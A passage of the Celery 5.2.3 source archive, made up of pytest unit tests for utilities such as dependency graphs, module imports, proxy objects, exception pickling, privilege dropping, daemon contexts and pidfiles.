3], (4, 5), [1, 2, 3, 4, 5]), ([1, 2], (3, 4, 5), (1, 2, 3, 4, 5)), ]) def test_seq_concat_seq(a, b, expected): res = seq_concat_seq(a, b) assert type(res) is type(expected) assert res == expected @pytest.mark.parametrize('a,b,expected', [ ((1, 2, 3), 4, (1, 2, 3, 4)), ([1, 2, 3], 4, [1, 2, 3, 4]), ]) def test_seq_concat_item(a, b, expected): res = seq_concat_item(a, b) assert type(res) is type(expected) assert res == expected class StarKwargsCallable: def __call__(self, **kwargs): return 1 class StarArgsStarKwargsCallable: def __call__(self, *args, **kwargs): return 1 class StarArgsCallable: def __call__(self, *args): return 1 class ArgsCallable: def __call__(self, a, b): return 1 class ArgsStarKwargsCallable: def __call__(self, a, b, **kwargs): return 1 class test_fun_accepts_kwargs: @pytest.mark.parametrize('fun', [ lambda a, b, **kwargs: 1, lambda *args, **kwargs: 1, lambda foo=1, **kwargs: 1, StarKwargsCallable(), StarArgsStarKwargsCallable(), ArgsStarKwargsCallable(), ]) def test_accepts(self, fun): assert fun_accepts_kwargs(fun) @pytest.mark.parametrize('fun', [ lambda a: 1, lambda a, b: 1, lambda *args: 1, lambda a, kw1=1, kw2=2: 1, StarArgsCallable(), ArgsCallable(), ]) def test_rejects(self, fun): assert not fun_accepts_kwargs(fun) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/t/unit/utils/test_graph.py0000664000175000017500000000361700000000000020000 0ustar00asifasif00000000000000from unittest.mock import Mock from celery.utils.graph import DependencyGraph from celery.utils.text import WhateverIO class test_DependencyGraph: def graph1(self): res_a = self.app.AsyncResult('A') res_b = self.app.AsyncResult('B') res_c = self.app.GroupResult('C', [res_a]) res_d = self.app.GroupResult('D', [res_c, res_b]) node_a = (res_a, []) node_b = (res_b, []) node_c = (res_c, [res_a]) node_d = (res_d, [res_c, res_b]) return DependencyGraph([ node_a, node_b, node_c, node_d, ]) def test_repr(self): assert repr(self.graph1()) def test_topsort(self): order = self.graph1().topsort() # C must start before D assert order.index('C') < order.index('D') # and B must start before D assert order.index('B') < order.index('D') # and A must start before C assert order.index('A') < order.index('C') def test_edges(self): edges = self.graph1().edges() assert sorted(edges, key=str) == ['C', 'D'] def test_connect(self): x, y = self.graph1(), self.graph1() x.connect(y) def test_valency_of_when_missing(self): x = self.graph1() assert x.valency_of('foobarbaz') == 0 def test_format(self): x = self.graph1() x.formatter = Mock() obj = Mock() assert x.format(obj) x.formatter.assert_called_with(obj) x.formatter = None assert x.format(obj) is obj def test_items(self): assert dict(self.graph1().items()) == { 'A': [], 'B': [], 'C': ['A'], 'D': ['C', 'B'], } def test_repr_node(self): x = self.graph1() assert x.repr_node('fasdswewqewq') def test_to_dot(self): s = WhateverIO() self.graph1().to_dot(s) assert s.getvalue() ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/t/unit/utils/test_imports.py0000664000175000017500000000635400000000000020375 0ustar00asifasif00000000000000import sys from unittest.mock import Mock, patch import pytest from celery.utils.imports import (NotAPackage, find_module, gen_task_name, module_file, qualname, reload_from_cwd) def test_find_module(): def imp_side_effect(module): if module == 'foo': return None else: raise ImportError(module) assert find_module('celery') imp = Mock() imp.side_effect = imp_side_effect with pytest.raises(NotAPackage) as exc_info: find_module('foo.bar.baz', imp=imp) assert exc_info.value.args[0] == 'foo' assert find_module('celery.worker.request') def test_find_module_legacy_namespace_package(tmp_path, monkeypatch): monkeypatch.chdir(str(tmp_path)) (tmp_path / 'pkg' / 'foo').mkdir(parents=True) (tmp_path / 'pkg' / '__init__.py').write_text( 'from pkgutil import extend_path\n' '__path__ = extend_path(__path__, __name__)\n') (tmp_path / 'pkg' / 'foo' / '__init__.py').write_text('') (tmp_path / 'pkg' / 'foo' / 'bar.py').write_text('') with patch.dict(sys.modules): for modname in list(sys.modules): if modname == 'pkg' or modname.startswith('pkg.'): del sys.modules[modname] with pytest.raises(ImportError): find_module('pkg.missing') with pytest.raises(ImportError): find_module('pkg.foo.missing') assert find_module('pkg.foo.bar') with pytest.raises(NotAPackage) as exc_info: find_module('pkg.foo.bar.missing') assert exc_info.value.args[0] == 'pkg.foo.bar' def test_find_module_pep420_namespace_package(tmp_path, monkeypatch): monkeypatch.chdir(str(tmp_path)) (tmp_path / 'pkg' / 'foo').mkdir(parents=True) (tmp_path / 'pkg' / 'foo' / '__init__.py').write_text('') (tmp_path / 'pkg' / 'foo' / 'bar.py').write_text('') with patch.dict(sys.modules): for modname in list(sys.modules): if modname == 'pkg' or modname.startswith('pkg.'): del sys.modules[modname] with pytest.raises(ImportError): find_module('pkg.missing') with pytest.raises(ImportError): find_module('pkg.foo.missing') assert find_module('pkg.foo.bar') with pytest.raises(NotAPackage) as exc_info: find_module('pkg.foo.bar.missing') assert exc_info.value.args[0] == 'pkg.foo.bar' def test_qualname(): Class = type('Fox', (object,), { '__module__': 'quick.brown', }) assert qualname(Class) == 'quick.brown.Fox' assert qualname(Class()) == 'quick.brown.Fox' def test_reload_from_cwd(patching): reload = patching('celery.utils.imports.reload') reload_from_cwd('foo') reload.assert_called() def test_reload_from_cwd_custom_reloader(): reload = Mock() reload_from_cwd('foo', reload) reload.assert_called() def test_module_file(): m1 = Mock() m1.__file__ = '/opt/foo/xyz.pyc' assert module_file(m1) == '/opt/foo/xyz.py' m2 = Mock() m2.__file__ = '/opt/foo/xyz.py' assert module_file(m1) == '/opt/foo/xyz.py' class test_gen_task_name: def test_no_module(self): app = Mock() app.name == '__main__' assert gen_task_name(app, 'foo', 'axsadaewe') ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/t/unit/utils/test_local.py0000664000175000017500000001774100000000000017774 0ustar00asifasif00000000000000from unittest.mock import Mock import pytest from celery.local import PromiseProxy, Proxy, maybe_evaluate, try_import class test_try_import: def test_imports(self): assert try_import(__name__) def test_when_default(self): default = object() assert try_import('foobar.awqewqe.asdwqewq', default) is default class test_Proxy: def test_std_class_attributes(self): assert Proxy.__name__ == 'Proxy' assert Proxy.__module__ == 'celery.local' assert isinstance(Proxy.__doc__, str) def test_doc(self): def real(): pass x = Proxy(real, __doc__='foo') assert x.__doc__ == 'foo' def test_name(self): def real(): """real function""" return 'REAL' x = Proxy(lambda: real, name='xyz') assert x.__name__ == 'xyz' y = Proxy(lambda: real) assert y.__name__ == 'real' assert x.__doc__ == 'real function' assert x.__class__ == type(real) assert x.__dict__ == real.__dict__ assert repr(x) == repr(real) assert x.__module__ def test_get_current_local(self): x = Proxy(lambda: 10) object.__setattr__(x, '_Proxy_local', Mock()) assert x._get_current_object() def test_bool(self): class X: def __bool__(self): return False __nonzero__ = __bool__ x = Proxy(lambda: X()) assert not x def test_slots(self): class X: __slots__ = () x = Proxy(X) with pytest.raises(AttributeError): x.__dict__ def test_dir(self): class X: def __dir__(self): return ['a', 'b', 'c'] x = Proxy(lambda: X()) assert dir(x) == ['a', 'b', 'c'] class Y: def __dir__(self): raise RuntimeError() y = Proxy(lambda: Y()) assert dir(y) == [] def test_getsetdel_attr(self): class X: a = 1 b = 2 c = 3 def __dir__(self): return ['a', 'b', 'c'] v = X() x = Proxy(lambda: v) assert x.__members__ == ['a', 'b', 'c'] assert x.a == 1 assert x.b == 2 assert x.c == 3 setattr(x, 'a', 10) assert x.a == 10 del(x.a) assert x.a == 1 def test_dictproxy(self): v = {} x = Proxy(lambda: v) x['foo'] = 42 assert x['foo'] == 42 assert len(x) == 1 assert 'foo' in x del(x['foo']) with pytest.raises(KeyError): x['foo'] assert iter(x) def test_listproxy(self): v = [] x = Proxy(lambda: v) x.append(1) x.extend([2, 3, 4]) assert x[0] == 1 assert x[:-1] == [1, 2, 3] del(x[-1]) assert x[:-1] == [1, 2] x[0] = 10 assert x[0] == 10 assert 10 in x assert len(x) == 3 assert iter(x) x[0:2] = [1, 2] del(x[0:2]) assert str(x) def test_complex_cast(self): class O: def __complex__(self): return complex(10.333) o = Proxy(O) assert o.__complex__() == complex(10.333) def test_index(self): class O: def __index__(self): return 1 o = Proxy(O) assert o.__index__() == 1 def test_coerce(self): class O: def __coerce__(self, other): return self, other o = Proxy(O) assert o.__coerce__(3) def test_int(self): assert Proxy(lambda: 10) + 1 == Proxy(lambda: 11) assert Proxy(lambda: 10) - 1 == Proxy(lambda: 9) assert Proxy(lambda: 10) * 2 == Proxy(lambda: 20) assert Proxy(lambda: 10) ** 2 == Proxy(lambda: 100) assert Proxy(lambda: 20) / 2 == Proxy(lambda: 10) assert Proxy(lambda: 20) // 2 == Proxy(lambda: 10) assert Proxy(lambda: 11) % 2 == Proxy(lambda: 1) assert Proxy(lambda: 10) << 2 == Proxy(lambda: 40) assert Proxy(lambda: 10) >> 2 == Proxy(lambda: 2) assert Proxy(lambda: 10) ^ 7 == Proxy(lambda: 13) assert Proxy(lambda: 10) | 40 == Proxy(lambda: 42) assert Proxy(lambda: 10) != Proxy(lambda: -11) assert Proxy(lambda: 10) != Proxy(lambda: -10) assert Proxy(lambda: -10) == Proxy(lambda: -10) assert Proxy(lambda: 10) < Proxy(lambda: 20) assert Proxy(lambda: 20) > Proxy(lambda: 10) assert Proxy(lambda: 10) >= Proxy(lambda: 10) assert Proxy(lambda: 10) <= Proxy(lambda: 10) assert Proxy(lambda: 10) == Proxy(lambda: 10) assert Proxy(lambda: 20) != Proxy(lambda: 10) assert Proxy(lambda: 100).__divmod__(30) assert Proxy(lambda: 100).__truediv__(30) assert abs(Proxy(lambda: -100)) x = Proxy(lambda: 10) x -= 1 assert x == 9 x = Proxy(lambda: 9) x += 1 assert x == 10 x = Proxy(lambda: 10) x *= 2 assert x == 20 x = Proxy(lambda: 20) x /= 2 assert x == 10 x = Proxy(lambda: 10) x %= 2 assert x == 0 x = Proxy(lambda: 10) x <<= 3 assert x == 80 x = Proxy(lambda: 80) x >>= 4 assert x == 5 x = Proxy(lambda: 5) x ^= 1 assert x == 4 x = Proxy(lambda: 4) x **= 4 assert x == 256 x = Proxy(lambda: 256) x //= 2 assert x == 128 x = Proxy(lambda: 128) x |= 2 assert x == 130 x = Proxy(lambda: 130) x &= 10 assert x == 2 x = Proxy(lambda: 10) assert type(x.__float__()) == float assert type(x.__int__()) == int assert hex(x) assert oct(x) def test_hash(self): class X: def __hash__(self): return 1234 assert hash(Proxy(lambda: X())) == 1234 def test_call(self): class X: def __call__(self): return 1234 assert Proxy(lambda: X())() == 1234 def test_context(self): class X: entered = exited = False def __enter__(self): self.entered = True return 1234 def __exit__(self, *exc_info): self.exited = True v = X() x = Proxy(lambda: v) with x as val: assert val == 1234 assert x.entered assert x.exited def test_reduce(self): class X: def __reduce__(self): return 123 x = Proxy(lambda: X()) assert x.__reduce__() == 123 class test_PromiseProxy: def test_only_evaluated_once(self): class X: attr = 123 evals = 0 def __init__(self): self.__class__.evals += 1 p = PromiseProxy(X) assert p.attr == 123 assert p.attr == 123 assert X.evals == 1 def test_callbacks(self): source = Mock(name='source') p = PromiseProxy(source) cbA = Mock(name='cbA') cbB = Mock(name='cbB') cbC = Mock(name='cbC') p.__then__(cbA, p) p.__then__(cbB, p) assert not p.__evaluated__() assert object.__getattribute__(p, '__pending__') assert repr(p) assert p.__evaluated__() with pytest.raises(AttributeError): object.__getattribute__(p, '__pending__') cbA.assert_called_with(p) cbB.assert_called_with(p) assert p.__evaluated__() p.__then__(cbC, p) cbC.assert_called_with(p) with pytest.raises(AttributeError): object.__getattribute__(p, '__pending__') def test_maybe_evaluate(self): x = PromiseProxy(lambda: 30) assert not x.__evaluated__() assert maybe_evaluate(x) == 30 assert maybe_evaluate(x) == 30 assert maybe_evaluate(30) == 30 assert x.__evaluated__() ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/t/unit/utils/test_nodenames.py0000664000175000017500000000031200000000000020635 0ustar00asifasif00000000000000from kombu import Queue from celery.utils.nodenames import worker_direct class test_worker_direct: def test_returns_if_queue(self): q = Queue('foo') assert worker_direct(q) is q ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/t/unit/utils/test_objects.py0000664000175000017500000000025400000000000020322 0ustar00asifasif00000000000000from celery.utils.objects import Bunch class test_Bunch: def test(self): x = Bunch(foo='foo', bar=2) assert x.foo == 'foo' assert x.bar == 2 ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/t/unit/utils/test_pickle.py0000664000175000017500000000255200000000000020143 0ustar00asifasif00000000000000from celery.utils.serialization import pickle class RegularException(Exception): pass class ArgOverrideException(Exception): def __init__(self, message, status_code=10): self.status_code = status_code super().__init__(message, status_code) class test_Pickle: def test_pickle_regular_exception(self): exc = None try: raise RegularException('RegularException raised') except RegularException as exc_: exc = exc_ pickled = pickle.dumps({'exception': exc}) unpickled = pickle.loads(pickled) exception = unpickled.get('exception') assert exception assert isinstance(exception, RegularException) assert exception.args == ('RegularException raised',) def test_pickle_arg_override_exception(self): exc = None try: raise ArgOverrideException( 'ArgOverrideException raised', status_code=100, ) except ArgOverrideException as exc_: exc = exc_ pickled = pickle.dumps({'exception': exc}) unpickled = pickle.loads(pickled) exception = unpickled.get('exception') assert exception assert isinstance(exception, ArgOverrideException) assert exception.args == ('ArgOverrideException raised', 100) assert exception.status_code == 100 ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1637501858.0 celery-5.2.3/t/unit/utils/test_platforms.py0000664000175000017500000010074300000000000020704 0ustar00asifasif00000000000000import errno import os import re import signal import sys import tempfile from unittest.mock import Mock, call, patch import pytest import t.skip from celery import _find_option_with_arg, platforms from celery.exceptions import SecurityError, SecurityWarning from celery.platforms import (ASSUMING_ROOT, ROOT_DISALLOWED, ROOT_DISCOURAGED, DaemonContext, LockFailed, Pidfile, _setgroups_hack, check_privileges, close_open_fds, create_pidlock, detached, fd_by_path, get_fdmax, ignore_errno, initgroups, isatty, maybe_drop_privileges, parse_gid, parse_uid, set_mp_process_title, set_pdeathsig, set_process_title, setgid, setgroups, setuid, signals) from celery.utils.text import WhateverIO from t.unit import conftest try: import resource except ImportError: # pragma: no cover resource = None def test_isatty(): fh = Mock(name='fh') assert isatty(fh) is fh.isatty() fh.isatty.side_effect = AttributeError() assert not isatty(fh) class test_find_option_with_arg: def test_long_opt(self): assert _find_option_with_arg( ['--foo=bar'], long_opts=['--foo']) == 'bar' def test_short_opt(self): assert _find_option_with_arg( ['-f', 'bar'], short_opts=['-f']) == 'bar' @t.skip.if_win32 def test_fd_by_path(): test_file = tempfile.NamedTemporaryFile() try: keep = fd_by_path([test_file.name]) assert keep == [test_file.file.fileno()] with patch('os.open') as _open: _open.side_effect = OSError() assert not fd_by_path([test_file.name]) finally: test_file.close() def test_close_open_fds(patching): _close = patching('os.close') fdmax = patching('billiard.compat.get_fdmax') with patch('os.closerange', create=True) as closerange: fdmax.return_value = 3 close_open_fds() if not closerange.called: _close.assert_has_calls([call(2), call(1), call(0)]) _close.side_effect = OSError() _close.side_effect.errno = errno.EBADF close_open_fds() class test_ignore_errno: def test_raises_EBADF(self): with ignore_errno('EBADF'): exc = OSError() exc.errno = errno.EBADF raise exc def test_otherwise(self): with pytest.raises(OSError): with ignore_errno('EBADF'): exc = OSError() exc.errno = errno.ENOENT raise exc class test_set_process_title: def test_no_setps(self): prev, platforms._setproctitle = platforms._setproctitle, None try: set_process_title('foo') finally: platforms._setproctitle = prev @patch('celery.platforms.set_process_title') @patch('celery.platforms.current_process') def test_mp_no_hostname(self, current_process, set_process_title): current_process().name = 'Foo' set_mp_process_title('foo', info='hello') set_process_title.assert_called_with('foo:Foo', info='hello') @patch('celery.platforms.set_process_title') @patch('celery.platforms.current_process') def test_mp_hostname(self, current_process, set_process_title): current_process().name = 'Foo' set_mp_process_title('foo', hostname='a@q.com', info='hello') set_process_title.assert_called_with('foo: a@q.com:Foo', info='hello') class test_Signals: @patch('signal.getsignal') def test_getitem(self, getsignal): signals['SIGINT'] getsignal.assert_called_with(signal.SIGINT) def test_supported(self): assert signals.supported('INT') assert not signals.supported('SIGIMAGINARY') @t.skip.if_win32 def test_reset_alarm(self): with patch('signal.alarm') as _alarm: signals.reset_alarm() _alarm.assert_called_with(0) def test_arm_alarm(self): if hasattr(signal, 'setitimer'): with patch('signal.setitimer', create=True) as seti: signals.arm_alarm(30) seti.assert_called() def test_signum(self): assert signals.signum(13) == 13 assert signals.signum('INT') == signal.SIGINT assert signals.signum('SIGINT') == signal.SIGINT with pytest.raises(TypeError): signals.signum('int') signals.signum(object()) @patch('signal.signal') def test_ignore(self, set): signals.ignore('SIGINT') set.assert_called_with(signals.signum('INT'), signals.ignored) signals.ignore('SIGTERM') set.assert_called_with(signals.signum('TERM'), signals.ignored) @patch('signal.signal') def test_reset(self, set): signals.reset('SIGINT') set.assert_called_with(signals.signum('INT'), signals.default) @patch('signal.signal') def test_setitem(self, set): def handle(*args): return args signals['INT'] = handle set.assert_called_with(signal.SIGINT, handle) @patch('signal.signal') def test_setitem_raises(self, set): set.side_effect = ValueError() signals['INT'] = lambda *a: a class test_set_pdeathsig: def test_call(self): set_pdeathsig('SIGKILL') @t.skip.if_win32 def test_call_with_correct_parameter(self): with patch('celery.platforms._set_pdeathsig') as _set_pdeathsig: set_pdeathsig('SIGKILL') _set_pdeathsig.assert_called_once_with(signal.SIGKILL) @t.skip.if_win32 class test_get_fdmax: @patch('resource.getrlimit') def test_when_infinity(self, getrlimit): with patch('os.sysconf') as sysconfig: sysconfig.side_effect = KeyError() getrlimit.return_value = [None, resource.RLIM_INFINITY] default = object() assert get_fdmax(default) is default @patch('resource.getrlimit') def test_when_actual(self, getrlimit): with patch('os.sysconf') as sysconfig: sysconfig.side_effect = KeyError() getrlimit.return_value = [None, 13] assert get_fdmax(None) == 13 @t.skip.if_win32 class test_maybe_drop_privileges: def test_on_windows(self): prev, sys.platform = sys.platform, 'win32' try: maybe_drop_privileges() finally: sys.platform = prev @patch('os.getegid') @patch('os.getgid') @patch('os.geteuid') @patch('os.getuid') @patch('celery.platforms.parse_uid') @patch('celery.platforms.parse_gid') @patch('pwd.getpwuid') @patch('celery.platforms.setgid') @patch('celery.platforms.setuid') @patch('celery.platforms.initgroups') def test_with_uid(self, initgroups, setuid, setgid, getpwuid, parse_gid, parse_uid, getuid, geteuid, getgid, getegid): geteuid.return_value = 10 getuid.return_value = 10 class pw_struct: pw_gid = 50001 def raise_on_second_call(*args, **kwargs): setuid.side_effect = OSError() setuid.side_effect.errno = errno.EPERM setuid.side_effect = raise_on_second_call getpwuid.return_value = pw_struct() parse_uid.return_value = 5001 parse_gid.return_value = 5001 maybe_drop_privileges(uid='user') parse_uid.assert_called_with('user') getpwuid.assert_called_with(5001) setgid.assert_called_with(50001) initgroups.assert_called_with(5001, 50001) setuid.assert_has_calls([call(5001), call(0)]) setuid.side_effect = raise_on_second_call def to_root_on_second_call(mock, first): return_value = [first] def on_first_call(*args, **kwargs): ret, return_value[0] = return_value[0], 0 return ret mock.side_effect = on_first_call to_root_on_second_call(geteuid, 10) to_root_on_second_call(getuid, 10) with pytest.raises(SecurityError): maybe_drop_privileges(uid='user') getuid.return_value = getuid.side_effect = None geteuid.return_value = geteuid.side_effect = None getegid.return_value = 0 getgid.return_value = 0 setuid.side_effect = raise_on_second_call with pytest.raises(SecurityError): maybe_drop_privileges(gid='group') getuid.reset_mock() geteuid.reset_mock() setuid.reset_mock() getuid.side_effect = geteuid.side_effect = None def raise_on_second_call(*args, **kwargs): setuid.side_effect = OSError() setuid.side_effect.errno = errno.ENOENT setuid.side_effect = raise_on_second_call with pytest.raises(OSError): maybe_drop_privileges(uid='user') @patch('celery.platforms.parse_uid') @patch('celery.platforms.parse_gid') @patch('celery.platforms.setgid') @patch('celery.platforms.setuid') @patch('celery.platforms.initgroups') def test_with_guid(self, initgroups, setuid, setgid, parse_gid, parse_uid): def raise_on_second_call(*args, **kwargs): setuid.side_effect = OSError() setuid.side_effect.errno = errno.EPERM setuid.side_effect = raise_on_second_call parse_uid.return_value = 5001 parse_gid.return_value = 50001 maybe_drop_privileges(uid='user', gid='group') parse_uid.assert_called_with('user') parse_gid.assert_called_with('group') setgid.assert_called_with(50001) initgroups.assert_called_with(5001, 50001) setuid.assert_has_calls([call(5001), call(0)]) setuid.side_effect = None with pytest.raises(SecurityError): maybe_drop_privileges(uid='user', gid='group') setuid.side_effect = OSError() setuid.side_effect.errno = errno.EINVAL with pytest.raises(OSError): maybe_drop_privileges(uid='user', gid='group') @patch('celery.platforms.setuid') @patch('celery.platforms.setgid') @patch('celery.platforms.parse_gid') def test_only_gid(self, parse_gid, setgid, setuid): parse_gid.return_value = 50001 maybe_drop_privileges(gid='group') parse_gid.assert_called_with('group') setgid.assert_called_with(50001) setuid.assert_not_called() @t.skip.if_win32 class test_setget_uid_gid: @patch('celery.platforms.parse_uid') @patch('os.setuid') def test_setuid(self, _setuid, parse_uid): parse_uid.return_value = 5001 setuid('user') parse_uid.assert_called_with('user') _setuid.assert_called_with(5001) @patch('celery.platforms.parse_gid') @patch('os.setgid') def test_setgid(self, _setgid, parse_gid): parse_gid.return_value = 50001 setgid('group') parse_gid.assert_called_with('group') _setgid.assert_called_with(50001) def test_parse_uid_when_int(self): assert parse_uid(5001) == 5001 @patch('pwd.getpwnam') def test_parse_uid_when_existing_name(self, getpwnam): class pwent: pw_uid = 5001 getpwnam.return_value = pwent() assert parse_uid('user') == 5001 @patch('pwd.getpwnam') def test_parse_uid_when_nonexisting_name(self, getpwnam): getpwnam.side_effect = KeyError('user') with pytest.raises(KeyError): parse_uid('user') def test_parse_gid_when_int(self): assert parse_gid(50001) == 50001 @patch('grp.getgrnam') def test_parse_gid_when_existing_name(self, getgrnam): class grent: gr_gid = 50001 getgrnam.return_value = grent() assert parse_gid('group') == 50001 @patch('grp.getgrnam') def test_parse_gid_when_nonexisting_name(self, getgrnam): getgrnam.side_effect = KeyError('group') with pytest.raises(KeyError): parse_gid('group') @t.skip.if_win32 class test_initgroups: @patch('pwd.getpwuid') @patch('os.initgroups', create=True) def test_with_initgroups(self, initgroups_, getpwuid): getpwuid.return_value = ['user'] initgroups(5001, 50001) initgroups_.assert_called_with('user', 50001) @patch('celery.platforms.setgroups') @patch('grp.getgrall') @patch('pwd.getpwuid') def test_without_initgroups(self, getpwuid, getgrall, setgroups): prev = getattr(os, 'initgroups', None) try: delattr(os, 'initgroups') except AttributeError: pass try: getpwuid.return_value = ['user'] class grent: gr_mem = ['user'] def __init__(self, gid): self.gr_gid = gid getgrall.return_value = [grent(1), grent(2), grent(3)] initgroups(5001, 50001) setgroups.assert_called_with([1, 2, 3]) finally: if prev: os.initgroups = prev @t.skip.if_win32 class test_detached: def test_without_resource(self): prev, platforms.resource = platforms.resource, None try: with pytest.raises(RuntimeError): detached() finally: platforms.resource = prev @patch('celery.platforms._create_pidlock') @patch('celery.platforms.signals') @patch('celery.platforms.maybe_drop_privileges') @patch('os.geteuid') @patch('builtins.open') def test_default(self, open, geteuid, maybe_drop, signals, pidlock): geteuid.return_value = 0 context = detached(uid='user', gid='group') assert isinstance(context, DaemonContext) signals.reset.assert_called_with('SIGCLD') maybe_drop.assert_called_with(uid='user', gid='group') open.return_value = Mock() geteuid.return_value = 5001 context = detached(uid='user', gid='group', logfile='/foo/bar') assert isinstance(context, DaemonContext) assert context.after_chdir context.after_chdir() open.assert_called_with('/foo/bar', 'a') open.return_value.close.assert_called_with() context = detached(pidfile='/foo/bar/pid') assert isinstance(context, DaemonContext) assert context.after_chdir context.after_chdir() pidlock.assert_called_with('/foo/bar/pid') @t.skip.if_win32 class test_DaemonContext: @patch('multiprocessing.util._run_after_forkers') @patch('os.fork') @patch('os.setsid') @patch('os._exit') @patch('os.chdir') @patch('os.umask') @patch('os.close') @patch('os.closerange') @patch('os.open') @patch('os.dup2') @patch('celery.platforms.close_open_fds') def test_open(self, _close_fds, dup2, open, close, closer, umask, chdir, _exit, setsid, fork, run_after_forkers): x = DaemonContext(workdir='/opt/workdir', umask=0o22) x.stdfds = [0, 1, 2] fork.return_value = 0 with x: assert x._is_open with x: pass assert fork.call_count == 2 setsid.assert_called_with() _exit.assert_not_called() chdir.assert_called_with(x.workdir) umask.assert_called_with(0o22) dup2.assert_called() fork.reset_mock() fork.return_value = 1 x = DaemonContext(workdir='/opt/workdir') x.stdfds = [0, 1, 2] with x: pass assert fork.call_count == 1 _exit.assert_called_with(0) x = DaemonContext(workdir='/opt/workdir', fake=True) x.stdfds = [0, 1, 2] x._detach = Mock() with x: pass x._detach.assert_not_called() x.after_chdir = Mock() with x: pass x.after_chdir.assert_called_with() x = DaemonContext(workdir='/opt/workdir', umask='0755') assert x.umask == 493 x = DaemonContext(workdir='/opt/workdir', umask='493') assert x.umask == 493 x.redirect_to_null(None) with patch('celery.platforms.mputil') as mputil: x = DaemonContext(after_forkers=True) x.open() mputil._run_after_forkers.assert_called_with() x = DaemonContext(after_forkers=False) x.open() @t.skip.if_win32 class test_Pidfile: @patch('celery.platforms.Pidfile') def test_create_pidlock(self, Pidfile): p = Pidfile.return_value = Mock() p.is_locked.return_value = True p.remove_if_stale.return_value = False with conftest.stdouts() as (_, err): with pytest.raises(SystemExit): create_pidlock('/var/pid') assert 'already exists' in err.getvalue() p.remove_if_stale.return_value = True ret = create_pidlock('/var/pid') assert ret is p def test_context(self): p = Pidfile('/var/pid') p.write_pid = Mock() p.remove = Mock() with p as _p: assert _p is p p.write_pid.assert_called_with() p.remove.assert_called_with() def test_acquire_raises_LockFailed(self): p = Pidfile('/var/pid') p.write_pid = Mock() p.write_pid.side_effect = OSError() with pytest.raises(LockFailed): with p: pass @patch('os.path.exists') def test_is_locked(self, exists): p = Pidfile('/var/pid') exists.return_value = True assert p.is_locked() exists.return_value = False assert not p.is_locked() def test_read_pid(self): with conftest.open() as s: s.write('1816\n') s.seek(0) p = Pidfile('/var/pid') assert p.read_pid() == 1816 def test_read_pid_partially_written(self): with conftest.open() as s: s.write('1816') s.seek(0) p = Pidfile('/var/pid') with pytest.raises(ValueError): p.read_pid() def test_read_pid_raises_ENOENT(self): exc = IOError() exc.errno = errno.ENOENT with conftest.open(side_effect=exc): p = Pidfile('/var/pid') assert p.read_pid() is None def test_read_pid_raises_IOError(self): exc = IOError() exc.errno = errno.EAGAIN with conftest.open(side_effect=exc): p = Pidfile('/var/pid') with pytest.raises(IOError): p.read_pid() def test_read_pid_bogus_pidfile(self): with conftest.open() as s: s.write('eighteensixteen\n') s.seek(0) p = Pidfile('/var/pid') with pytest.raises(ValueError): p.read_pid() @patch('os.unlink') def test_remove(self, unlink): unlink.return_value = True p = Pidfile('/var/pid') p.remove() unlink.assert_called_with(p.path) @patch('os.unlink') def test_remove_ENOENT(self, unlink): exc = OSError() exc.errno = errno.ENOENT unlink.side_effect = exc p = Pidfile('/var/pid') p.remove() unlink.assert_called_with(p.path) @patch('os.unlink') def test_remove_EACCES(self, unlink): exc = OSError() exc.errno = errno.EACCES unlink.side_effect = exc p = Pidfile('/var/pid') p.remove() unlink.assert_called_with(p.path) @patch('os.unlink') def test_remove_OSError(self, unlink): exc = OSError() exc.errno = errno.EAGAIN unlink.side_effect = exc p = Pidfile('/var/pid') with pytest.raises(OSError): p.remove() unlink.assert_called_with(p.path) @patch('os.kill') def test_remove_if_stale_process_alive(self, kill): p = Pidfile('/var/pid') p.read_pid = Mock() p.read_pid.return_value = 1816 kill.return_value = 0 assert not p.remove_if_stale() kill.assert_called_with(1816, 0) p.read_pid.assert_called_with() kill.side_effect = OSError() kill.side_effect.errno = errno.ENOENT assert not p.remove_if_stale() @patch('os.kill') def test_remove_if_stale_process_dead(self, kill): with conftest.stdouts(): p = Pidfile('/var/pid') p.read_pid = Mock() p.read_pid.return_value = 1816 p.remove = Mock() exc = OSError() exc.errno = errno.ESRCH kill.side_effect = exc assert p.remove_if_stale() kill.assert_called_with(1816, 0) p.remove.assert_called_with() def test_remove_if_stale_broken_pid(self): with conftest.stdouts(): p = Pidfile('/var/pid') p.read_pid = Mock() p.read_pid.side_effect = ValueError() p.remove = Mock() assert p.remove_if_stale() p.remove.assert_called_with() @patch('os.kill') def test_remove_if_stale_unprivileged_user(self, kill): with conftest.stdouts(): p = Pidfile('/var/pid') p.read_pid = Mock() p.read_pid.return_value = 1817 p.remove = Mock() exc = OSError() exc.errno = errno.EPERM kill.side_effect = exc assert p.remove_if_stale() kill.assert_called_with(1817, 0) p.remove.assert_called_with() def test_remove_if_stale_no_pidfile(self): p = Pidfile('/var/pid') p.read_pid = Mock() p.read_pid.return_value = None p.remove = Mock() assert p.remove_if_stale() p.remove.assert_called_with() @patch('os.fsync') @patch('os.getpid') @patch('os.open') @patch('os.fdopen') @patch('builtins.open') def test_write_pid(self, open_, fdopen, osopen, getpid, fsync): getpid.return_value = 1816 osopen.return_value = 13 w = fdopen.return_value = WhateverIO() w.close = Mock() r = open_.return_value = WhateverIO() r.write('1816\n') r.seek(0) p = Pidfile('/var/pid') p.write_pid() w.seek(0) assert w.readline() == '1816\n' w.close.assert_called() getpid.assert_called_with() osopen.assert_called_with( p.path, platforms.PIDFILE_FLAGS, platforms.PIDFILE_MODE, ) fdopen.assert_called_with(13, 'w') fsync.assert_called_with(13) open_.assert_called_with(p.path) @patch('os.fsync') @patch('os.getpid') @patch('os.open') @patch('os.fdopen') @patch('builtins.open') def test_write_reread_fails(self, open_, fdopen, osopen, getpid, fsync): getpid.return_value = 1816 osopen.return_value = 13 w = fdopen.return_value = WhateverIO() w.close = Mock() r = open_.return_value = WhateverIO() r.write('11816\n') r.seek(0) p = Pidfile('/var/pid') with 